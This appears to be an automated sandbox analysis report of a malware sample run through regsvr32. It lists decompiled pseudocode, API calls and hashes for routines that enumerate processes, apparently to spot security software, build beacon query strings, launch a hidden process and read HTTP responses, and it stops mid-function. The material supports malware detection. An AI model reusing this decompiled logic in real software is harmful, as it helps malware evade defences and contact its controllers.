Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: b773881c32be77b7606a190e6cd95a2923e61c6c6886505c821c6b337f881486
Instruction ID: c9b4315fd1db8e3eac723a45ea95e803bc464fe97f5737652806ed036f24c400
Opcode Fuzzy Hash: b773881c32be77b7606a190e6cd95a2923e61c6c6886505c821c6b337f881486
Instruction Fuzzy Hash: 83816F74E40204EBD7E0EBF499C4BAB77A9AB487047240E65BF05D7105EF3DE9468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7256 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02AF7256() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2afa348; // 0x248d5a8
						_t2 = _t9 + 0x2afbea8; // 0x73617661
						_push( &_v264);
						if( *0x2afa12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02af7261
0x02af726b
0x02af726f
0x02af7279
0x02af72aa
0x02af7280
0x02af7285
0x02af7292
0x02af729b
0x02af72b2
0x02af729d
0x02af72a5
0x00000000
0x02af72a5
0x02af72b3
0x02af72b4
0x00000000
0x02af72b4
0x00000000
0x02af72ae
0x02af72ba
0x02af72bf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02AF7266
Process32First.KERNEL32(00000000,?), ref: 02AF7279
Process32Next.KERNEL32(00000000,?), ref: 02AF72A5
CloseHandle.KERNEL32(00000000), ref: 02AF72B4

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f893d06d782a2075c5cd5ba53ce8fe60e7e5d11f66686e3fc361cfefb7fe280a
Instruction ID: 8831197eb83cce426328cadf4575ba54ac7203782eeafcf37ae7e1c8cd4dabfa
Opcode Fuzzy Hash: f893d06d782a2075c5cd5ba53ce8fe60e7e5d11f66686e3fc361cfefb7fe280a
Instruction Fuzzy Hash: D1F096325401146ADBE1A7E68D48EDBF6BDDBC9354F0100A1FB49C2040EF2CD5578AB1

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6CA4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E02AF6CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x2afa018; // 0xe8f22e63
				asm("bswap eax");
				_t70 =  *0x2afa014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x2afa010; // 0xd8d2f808
				asm("bswap eax");
				_t72 = E02AFA00C; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x2afa348; // 0x248d5a8
				_t3 = _t73 + 0x2afb62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x2afa02c,  *0x2afa004, _t68);
				_t76 = E02AF1308();
				_t77 =  *0x2afa348; // 0x248d5a8
				_t4 = _t77 + 0x2afb66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x2afa348; // 0x248d5a8
					_t8 = _t148 + 0x2afb676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x2afa348; // 0x248d5a8
				_t10 = _t81 + 0x2afb78e; // 0x4f88d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x2afb2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x2afa36c; // 0x4f895b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x2afa348; // 0x248d5a8
					_t16 = _t144 + 0x2afb889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E02AF3DE0(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x2afa348; // 0x248d5a8
					_t19 = _t139 + 0x2afb8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x2afa2d8, 0, _a40);
				}
				_t87 = E02AF3ACA();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x2afa348; // 0x248d5a8
					_t23 = _t135 + 0x2afb8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x2afa2d8, 0, _a40);
				}
				_t166 =  *0x2afa3cc; // 0x4f89600
				_t89 = E02AF4B69(0x2afa00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x2afa2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x2afa2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x2afa2d8, _t172, _a8);
						goto L30;
					}
					E02AF53AE(GetTickCount());
					_t96 =  *0x2afa3cc; // 0x4f89600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x2afa3cc; // 0x4f89600
					__imp__(_t100 + 0x40);
					_t102 =  *0x2afa3cc; // 0x4f89600
					_t168 = E02AF2281(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x2afa2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x2af9280);
					_push(_t168);
					_t108 = E02AF6311();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x2afa2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E02AF3D2E( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E02AF14C6();
						L26:
						HeapFree( *0x2afa2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E02AF7446(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E02AF1335(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E02AF789E(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E02AF5F92(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E02AF789E(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x02af6ca4
0x02af6ca4
0x02af6ca8
0x02af6caf
0x02af6cb9
0x02af6cbb
0x02af6cbb
0x02af6cc8
0x02af6cd3
0x02af6cd6
0x02af6ce1
0x02af6ce4
0x02af6ce9
0x02af6cec
0x02af6cf1
0x02af6cf4
0x02af6d00
0x02af6d0d
0x02af6d0f
0x02af6d15
0x02af6d1a
0x02af6d25
0x02af6d27
0x02af6d2a
0x02af6d31
0x02af6d33
0x02af6d3c
0x02af6d47
0x02af6d49
0x02af6d4c
0x02af6d4c
0x02af6d4e
0x02af6d53
0x02af6d53
0x02af6d5b
0x02af6d5f
0x02af6d65
0x02af6d70
0x02af6d72
0x02af6d77
0x02af6d7c
0x02af6d7f
0x02af6d84
0x02af6d8f
0x02af6d91
0x02af6d94
0x02af6d94
0x02af6d96
0x02af6da1
0x02af6da7
0x02af6daa
0x02af6daf
0x02af6dba
0x02af6dbc
0x02af6dc3
0x02af6dcd
0x02af6dcd
0x02af6dcf
0x02af6dd4
0x02af6dda
0x02af6ddd
0x02af6de2
0x02af6dec
0x02af6dee
0x02af6dfd
0x02af6dfd
0x02af6dff
0x02af6e0d
0x02af6e12
0x02af6e14
0x02af6e1a
0x02af6ffa
0x02af7002
0x02af700f
0x02af6e20
0x02af6e2c
0x02af6e32
0x02af6e38
0x02af6fed
0x02af6ff8
0x00000000
0x02af6ff8
0x02af6e44
0x02af6e49
0x02af6e52
0x02af6e63
0x02af6e67
0x02af6e70
0x02af6e76
0x02af6e83
0x02af6e90
0x02af6e96
0x02af6fe0
0x02af6feb
0x00000000
0x02af6feb
0x02af6ea2
0x02af6ea8
0x02af6ea9
0x02af6eae
0x02af6eb4
0x02af6fd6
0x02af6fde
0x00000000
0x02af6fde
0x02af6ebe
0x02af6ec5
0x02af6ecf
0x02af6ed5
0x02af6edf
0x02af6ef1
0x02af6ef3
0x02af6ef9
0x02af7012
0x02af6fc1
0x02af6fc1
0x02af6fc6
0x02af6fd2
0x02af6fd4
0x00000000
0x02af6fd4
0x02af6f04
0x02af6f09
0x02af6f0f
0x02af6f1a
0x02af6f25
0x02af6f29
0x02af6f2f
0x02af6f35
0x02af6f3b
0x02af6f3e
0x02af6f44
0x02af6f47
0x02af6f4c
0x02af6f50
0x02af6f50
0x02af6f5d
0x02af6f6b
0x02af6f70
0x02af6f72
0x02af6f78
0x02af6f7e
0x02af6f80
0x02af6f85
0x02af6f89
0x02af6fa5
0x02af6fa5
0x02af6f78
0x00000000
0x02af6f5f
0x02af6f64
0x02af6fa7
0x02af6fab
0x02af6fb5
0x00000000
0x00000000
0x00000000
0x00000000
0x02af6fb5
0x02af6f66
0x00000000
0x02af6f66
0x02af6f5d

APIs

GetTickCount.KERNEL32 ref: 02AF6CBB
wsprintfA.USER32 ref: 02AF6D08
wsprintfA.USER32 ref: 02AF6D25
wsprintfA.USER32 ref: 02AF6D47
wsprintfA.USER32 ref: 02AF6D6E
wsprintfA.USER32 ref: 02AF6D8F
wsprintfA.USER32 ref: 02AF6DBA
HeapFree.KERNEL32(00000000,?), ref: 02AF6DCD
wsprintfA.USER32 ref: 02AF6DEC
HeapFree.KERNEL32(00000000,?), ref: 02AF6DFD

Part of subcall function 02AF4B69: RtlEnterCriticalSection.NTDLL(04F895C0), ref: 02AF4B85
Part of subcall function 02AF4B69: RtlLeaveCriticalSection.NTDLL(04F895C0), ref: 02AF4BA3

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02AF6E2C
GetTickCount.KERNEL32 ref: 02AF6E3E
RtlEnterCriticalSection.NTDLL(04F895C0), ref: 02AF6E52
RtlLeaveCriticalSection.NTDLL(04F895C0), ref: 02AF6E70

Part of subcall function 02AF2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22AC
Part of subcall function 02AF2281: lstrlen.KERNEL32(00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22B4
Part of subcall function 02AF2281: strcpy.NTDLL ref: 02AF22CB
Part of subcall function 02AF2281: lstrcat.KERNEL32(00000000,00000000), ref: 02AF22D6
Part of subcall function 02AF2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22F3

StrTrimA.SHLWAPI(00000000,02AF9280,?,04F89600), ref: 02AF6EA2

Part of subcall function 02AF6311: lstrlen.KERNEL32(04F89BB8,00000000,00000000,00000000,02AF385C,00000000), ref: 02AF6321
Part of subcall function 02AF6311: lstrlen.KERNEL32(?), ref: 02AF6329
Part of subcall function 02AF6311: lstrcpy.KERNEL32(00000000,04F89BB8), ref: 02AF633D
Part of subcall function 02AF6311: lstrcat.KERNEL32(00000000,?), ref: 02AF6348

lstrcpy.KERNEL32(00000000,?), ref: 02AF6EC5
lstrcpy.KERNEL32(?,?), ref: 02AF6ECF
lstrcat.KERNEL32(?,?), ref: 02AF6EDF
lstrcat.KERNEL32(?,00000000), ref: 02AF6EE6

Part of subcall function 02AF3D2E: lstrlen.KERNEL32(?,00000000,04F89DC0,00000000,02AF695F,04F89FE3,69B25F44,?,?,?,?,69B25F44,00000005,02AFA00C,4D283A53,?), ref: 02AF3D35
Part of subcall function 02AF3D2E: mbstowcs.NTDLL ref: 02AF3D5E
Part of subcall function 02AF3D2E: memset.NTDLL ref: 02AF3D70

wcstombs.NTDLL ref: 02AF6F89

Part of subcall function 02AF1335: SysAllocString.OLEAUT32(?), ref: 02AF1370

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

HeapFree.KERNEL32(00000000,?), ref: 02AF6FD2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02AF6FDE
HeapFree.KERNEL32(00000000,?,?,04F89600), ref: 02AF6FEB
HeapFree.KERNEL32(00000000,?), ref: 02AF6FF8
HeapFree.KERNEL32(00000000,?), ref: 02AF7002

Strings

Uqt, xrefs: 02AF6D9B

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uqt
API String ID: 1185349883-2320327147
Opcode ID: c0fb49ab78b2571fce0439367c8378a42d585f8c4214cf6297af7fe1f8b80936
Instruction ID: d0baea6ccfdf78a074bb9a1d5dc6ea2f6fddc33d2f603f2da68484b74c9c8066
Opcode Fuzzy Hash: c0fb49ab78b2571fce0439367c8378a42d585f8c4214cf6297af7fe1f8b80936
Instruction Fuzzy Hash: 4BA1AE71940300AFC791AFA4DC84E9ABBE8EF88714F050919F689D3221DF39E966DB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3BF0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02AF3BF0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02AF2AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02AF7A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2afa300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2afa348; // 0x248d5a8
					_t18 = _t47 + 0x2afb3f3; // 0x73797325
					_t68 = E02AF3A12(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2afa348; // 0x248d5a8
						_t19 = _t50 + 0x2afb73f; // 0x4f88ce7
						_t20 = _t50 + 0x2afb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02AF2058();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02AF2058();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2afa2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02AF789E(_t70);
				goto L12;
			}

0x02af3bf8
0x02af3bf8
0x02af3c07
0x02af3c0e
0x02af3c13
0x02af3d20
0x02af3d27
0x02af3d27
0x02af3c22
0x02af3c2a
0x02af3c2d
0x02af3c32
0x02af3c47
0x02af3c4d
0x02af3c4e
0x02af3c51
0x02af3c57
0x02af3c5a
0x02af3c5f
0x02af3c67
0x02af3c73
0x02af3c77
0x02af3d07
0x02af3c7d
0x02af3c7d
0x02af3c82
0x02af3c89
0x02af3c9d
0x02af3ca1
0x02af3cf0
0x02af3ca3
0x02af3ca4
0x02af3cab
0x02af3cc4
0x02af3cc6
0x02af3cca
0x02af3cd1
0x02af3ceb
0x02af3cd3
0x02af3cdc
0x02af3ce1
0x02af3ce1
0x02af3cd1
0x02af3cff
0x02af3cff
0x02af3c77
0x02af3d0e
0x02af3d17
0x02af3d1b
0x00000000

APIs

Part of subcall function 02AF2AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02AF3C0C,?,?,?,?,00000000,00000000), ref: 02AF2ACB
Part of subcall function 02AF2AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02AF2AED
Part of subcall function 02AF2AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02AF2B03
Part of subcall function 02AF2AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02AF2B19
Part of subcall function 02AF2AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02AF2B2F
Part of subcall function 02AF2AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02AF2B45

memset.NTDLL ref: 02AF3C5A

Part of subcall function 02AF3A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02AF3C73,73797325), ref: 02AF3A23
Part of subcall function 02AF3A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02AF3A3D

GetModuleHandleA.KERNEL32(4E52454B,04F88CE7,73797325), ref: 02AF3C90
GetProcAddress.KERNEL32(00000000), ref: 02AF3C97
HeapFree.KERNEL32(00000000,00000000), ref: 02AF3CFF

Part of subcall function 02AF2058: GetProcAddress.KERNEL32(36776F57,02AF58B5), ref: 02AF2073

CloseHandle.KERNEL32(00000000,00000001), ref: 02AF3CDC
CloseHandle.KERNEL32(?), ref: 02AF3CE1
GetLastError.KERNEL32(00000001), ref: 02AF3CE5

Strings

@MqtNqt, xrefs: 02AF3CE5
Uqt, xrefs: 02AF3CFF

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3075724336-3266969629
Opcode ID: 130442a3640b08a916a2ba171859e063d04c58528982ce3d472e9ff593f1f148
Instruction ID: 6fb3a65376bedb52d4b6fffc2c06782d0ec12e69b299fc6a5f8c35d80138799a
Opcode Fuzzy Hash: 130442a3640b08a916a2ba171859e063d04c58528982ce3d472e9ff593f1f148
Instruction Fuzzy Hash: EA3132B6C40249AFDB50AFE4DD88E9EBBBDEB08344F1049A5F705A7111DB389A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02AF4E4D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF4E4D(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02AF7A71(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02AF789E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02AF2129( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02af4e4d
0x02af4e4d
0x02af4e5d
0x02af4e60
0x02af4e64
0x02af4e6a
0x02af4e6f
0x02af4e88
0x02af4e9c
0x02af4ea3
0x02af4eaa
0x02af4efd
0x02af4f03
0x02af4f09
0x02af4f44
0x02af4f4a
0x00000000
0x00000000
0x00000000
0x02af4f09
0x02af4eb0
0x00000000
0x02af4eb7
0x02af4ec5
0x02af4ec8
0x02af4ecb
0x02af4ed7
0x02af4edb
0x02af4f3d
0x02af4edd
0x02af4eef
0x02af4f2d
0x02af4f38
0x02af4ef1
0x02af4ef4
0x02af4ef8
0x02af4ef8
0x02af4eef
0x00000000
0x02af4edb
0x02af4eb0
0x02af4e74
0x02af4e7a
0x02af4e7d
0x02af4e82
0x00000000
0x00000000
0x00000000
0x02af4f12
0x02af4f1a
0x02af4f1f
0x02af4f22
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02AF4E64
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?), ref: 02AF4E74
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02AF4EA6
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02AF4ECB
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02AF4EEB
GetLastError.KERNEL32 ref: 02AF4EFD

Part of subcall function 02AF2129: WaitForMultipleObjects.KERNEL32(00000002,02AF7C1D,00000000,02AF7C1D,?,?,?,02AF7C1D,0000EA60), ref: 02AF2144

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

GetLastError.KERNEL32(00000000), ref: 02AF4F32

Strings

@MqtNqt, xrefs: 02AF4EFD, 02AF4F32

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MqtNqt
API String ID: 3369646462-2883916605
Opcode ID: 37591c1ac34c7b6f1c510ec5b81d43692872e11412c9e3f4eed59c694aac1f20
Instruction ID: cf2bb47a093ca41ed80521133977c43ff78207bd6772b4d68a31fb40045c9843
Opcode Fuzzy Hash: 37591c1ac34c7b6f1c510ec5b81d43692872e11412c9e3f4eed59c694aac1f20
Instruction Fuzzy Hash: 9031EDB5D00309EFDB61DFE5C8C4AAFBBB8AB08704F11496AE706A2550DB389A45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF41C5 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E02AF41C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x2afa3dc; // 0x4f89c68
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
